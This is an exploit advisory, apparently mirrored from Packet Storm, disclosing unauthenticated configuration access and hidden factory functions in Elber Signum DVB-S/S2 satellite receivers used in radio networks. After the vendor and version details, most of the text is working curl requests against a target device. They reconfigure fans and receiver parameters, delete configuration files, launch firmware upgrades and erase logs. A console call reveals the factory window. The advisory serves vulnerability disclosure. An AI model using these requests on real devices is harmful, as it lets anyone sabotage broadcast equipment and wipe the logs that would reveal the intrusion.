Share
## https://sploitus.com/exploit?id=PACKETSTORM:178135
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config  
  
  
Vendor: Elber S.r.l.  
Product web page: https://www.elber.it  
Affected version: 1.999 Revision 1243  
1.317 Revision 602  
1.220 Revision 1250  
1.220 Revision 1248_1249  
1.220 Revision 597  
1.217 Revision 1242  
1.214 Revision 1023  
1.193 Revision 924  
1.175 Revision 873  
1.166 Revision 550  
  
Summary: The SIGNUM controller from Elber satellite equipment demodulates  
one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving  
256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned  
and configured in 1+1 seamless switching for redundancy. Redundancy can also  
be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II  
audio codec, providing analog and digital outputs; moreover, itโ€™s possible  
to set a data PID to be decoded and passed to the internal RDS encoder,  
generating the dual MPX FM output.  
  
Desc: The device suffers from an unauthenticated device configuration and  
client-side hidden functionality disclosure.  
  
Tested on: NBFM Controller  
embOS/IP  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2024-5815  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php  
  
  
18.08.2023  
  
--  
  
  
# Config fan  
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='  
Configuration applied  
  
# Delete config  
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'  
File delete successfully  
  
# Launch upgrade  
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'  
Upgrade launched Successfully  
  
# Log erase  
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'  
Logs erased  
  
# Until:  
# =0 ALL  
# =-2 Yesterday  
# =-8 Last week  
# =-15 Last two weeks  
# =-22 Last three weeks  
# =-31 Last month  
  
# Set RX config  
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'  
RX Config Applied Successfully  
  
# Show factory window and FPGA upload (Console)  
> cleber_show_factory_wnd()  
  
# Etc.